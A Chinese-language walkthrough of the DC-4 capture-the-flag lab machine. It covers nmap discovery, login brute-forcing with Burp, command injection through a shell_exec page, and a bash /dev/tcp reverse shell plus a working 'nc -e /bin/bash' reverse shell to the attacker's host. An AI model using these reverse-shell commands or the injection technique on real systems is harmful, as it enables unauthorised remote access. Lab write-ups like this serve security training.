DC-4靶机
下载 ,安装(vmware直接导入文件),桥接 kali开始nmap扫描 nmap -sP 192.168.123.0/24 找到目标ip:192.168.123.9 浏览器访问,就一个登陆页面 nmap扫描端口;只有22和80 可以确定是linux了(废话) 再dirsearch扫描目录 也没有有用的信息 先试试注入,手注和sqlmap都没找出什么来 burp抓包跑字典暴力破解再试试看 暴力破解出了结果 admin happy 登陆后的页面, 只有一个command,点进去,有3个命令供执行 ls -l 显示目录内容列表 du -h 显示每个文件和目录的磁盘使用情况 df -h 显示磁盘相关信息 试试抓包,执行命令作为明文参数,修改成别的,发现也可以执行(这里我是换成了dir) 验证其可行性后,试试看别的命令,cat command.php 可以看到执行命令的是这个shell_exec()函数 用户是www-data,权限组在33 没有写文件的权限 直接 反弹shell 看上去像是把命令里的&符当成分隔符了。编码一下就解决了 bash+-i+>%26%2Fdev%2Ftcp%2F192.168.123.42%2F1234+0>%261 然鹅还是反弹不出来,看不到报错,也不知道是什么的原因 换nc反弹 nc 192.168.123.41 1234 -e /bin/bash 反弹成功